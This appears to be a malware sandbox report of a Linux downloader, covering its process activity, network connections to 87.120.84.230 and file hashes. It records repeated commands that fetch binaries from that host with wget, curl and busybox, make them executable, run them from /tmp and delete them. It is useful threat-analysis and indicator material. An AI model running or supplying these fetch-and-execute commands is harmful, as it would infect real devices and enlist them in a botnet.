[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97